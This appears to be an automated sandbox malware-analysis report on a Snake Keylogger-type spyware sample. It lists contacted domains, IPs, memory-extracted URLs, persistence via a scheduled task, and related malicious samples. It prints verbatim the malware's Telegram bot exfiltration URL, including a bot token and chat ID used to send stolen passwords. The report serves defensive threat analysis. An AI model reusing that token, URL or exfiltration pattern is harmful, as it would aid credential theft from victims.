https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535	0%	Avira URL Cloud	safe
http://tempuri.org/DataSet1.xsd	0%	Avira URL Cloud	safe
http://api.telegram.org	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	158.101.44.242	true	false	unknown
15.164.165.52.in-addr.arpa	unknown	unknown	true	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535	EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org	rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000302B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000289E000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://microsoft.co	rPO0977-6745.exe, 0000000A.00000002.3699929015.0000000006720000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.orgh	EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	rPO0977-6745.exe, 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/DataSet1.xsd	rPO0977-6745.exe, EDyxAgkldisLe.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://reallyfreegeoip.org	rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003000000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002873000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000302B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000289E000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000302B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000284F000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002924000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000289E000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://api.telegram.org	rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	rPO0977-6745.exe, 00000000.00000002.1265411156.0000000003191000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 0000000B.00000002.1306085363.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	rPO0977-6745.exe, 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1480082
Start date and time:	2024-07-24 15:07:25 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	rPO0977-6745.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@21/15@4/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 287 Number of non-executed functions: 16
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target EDyxAgkldisLe.exe, PID 8004 because it is empty
Execution Graph export aborted for target rPO0977-6745.exe, PID 2916 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: rPO0977-6745.exe

Simulations

Behavior and APIs

Time	Type	Description
09:08:16	API Interceptor	8930141x Sleep call for process: rPO0977-6745.exe modified
09:08:18	API Interceptor	30x Sleep call for process: powershell.exe modified
09:08:20	API Interceptor	6798143x Sleep call for process: EDyxAgkldisLe.exe modified
15:08:18	Task Scheduler	Run new task: EDyxAgkldisLe path: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	z23RevisedInvoice.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse
	Updated PI.exe	Get hash	malicious	AgentTesla, RedLine	Browse
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	231210-06-AgentTesla-9da180.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse
	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Apixaban - August 2024.XLS.exe	Get hash	malicious	Snake Keylogger	Browse
188.114.97.3	Quotation.xls	Get hash	malicious	Remcos	Browse	tny.wtf/jk8Z5I
	NUEVO ORDEN01_202407238454854.pdf.exe	Get hash	malicious	FormBook	Browse	www.010101-11122-2222.cloud/rn94/?ndsLnTq=grMJGHTOpxQfD2iixWctBZvhCYtmqSbLUJDCoaQDnQJ3Rh8vFQmgv7kvDLvYcoaVSk1M&pPO=DFQxUrcpRxVH
	DRAFT AWB and DRAFT Commercial invoice.xls	Get hash	malicious	Remcos	Browse	tny.wtf/cyd
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/4jaIXkvS/download
	QUOTATION_JULQTRA071244.PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/PM6yPStj/download
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/0DmcWsUI/download
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/4jaIXkvS/download
	QUOTATION_JULQTRA071244.PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/PM6yPStj/download
	Purchase Order - P04737.xls	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	tny.wtf/Dl
	#U00d6deme kopyas#U0131.xls	Get hash	malicious	Remcos	Browse	tny.wtf/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Purchase Order.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	188.114.96.3
	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Apixaban - August 2024.XLS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
checkip.dyndns.com	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	rRFQ_025261-97382.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	Purchase Order.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	132.226.247.73
	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
api.telegram.org	z23RevisedInvoice.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	149.154.167.220
	Updated PI.exe	Get hash	malicious	AgentTesla, RedLine	Browse	149.154.167.220
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	231210-06-AgentTesla-9da180.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	149.154.167.220
	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Apixaban - August 2024.XLS.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	z23RevisedInvoice.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	149.154.167.220
	Updated PI.exe	Get hash	malicious	AgentTesla, RedLine	Browse	149.154.167.220
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	231210-06-AgentTesla-9da180.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	149.154.167.220
	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Apixaban - August 2024.XLS.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	https://0f34q.n8xgn.com/0f34Q/&design=DAGL1KVwhx0&accessRole=viewer&linkSource=document	Get hash	malicious	Unknown	Browse	104.21.95.143
	https://jul-fat.s3.us-east-2.amazonaws.com/Comprovativo_Julho_ilxtf_11-07-2024_17.zip?=CBJWEMFPSBTBJTCWJMMHXOTTZAUEUJDNBHBGDALULXNCKKLTVEMGSERPIRBESAUHZGABRXVIASXKAQTZPAJPZXVXRNWNKFBJCEFTKICKJDGKIROSZDPSRFJBLDLDZHIVRMZXLKWFZLEUQVOKKGPVRITXUDIVWWBBUMIXTRGWFJUGAQLPQLERTODHT	Get hash	malicious	Unknown	Browse	1.1.1.1
	Sync_Approval_Document.html	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Fw PROPOSITION DE BELGOSUC.eml	Get hash	malicious	SharepointPhisher	Browse	188.114.97.3
	roquette.com PURCHASE ORDER.htm	Get hash	malicious	Unknown	Browse	188.114.96.3
	ELECTRONIC RECEIPTGrba.html	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://www.canva.com/design/DAGL1KVwhx0/GKVImkBFgqHp2esQ4hZ4Gg/edit	Get hash	malicious	Unknown	Browse	172.67.74.152
	Sync_Approval_Document.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
ORACLE-BMC-31898US	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	rRFQ_025261-97382.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Apixaban - August 2024.XLS.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SMLCHtAAMK.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	afRggioa9s.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	afRggioa9s.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	Purchase Order.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	188.114.97.3
	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Apixaban - August 2024.XLS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	SMLCHtAAMK.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	2A7EDCA327F4C5D10592B4B75A7CE8B394553F18BF975C46B3FE76306D146FAE.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Sync_Approval_Document.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Updated PI.exe	Get hash	malicious	AgentTesla, RedLine	Browse	149.154.167.220
	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	roquette.com PURCHASE ORDER.htm	Get hash	malicious	Unknown	Browse	149.154.167.220
	nJC3400-GS SICO NEW ORLEANS.pif.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	abrirpdf_45868.msi	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	231210-06-AgentTesla-9da180.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	231210-04-AgentTesla-38a0d6.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220

Process:	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

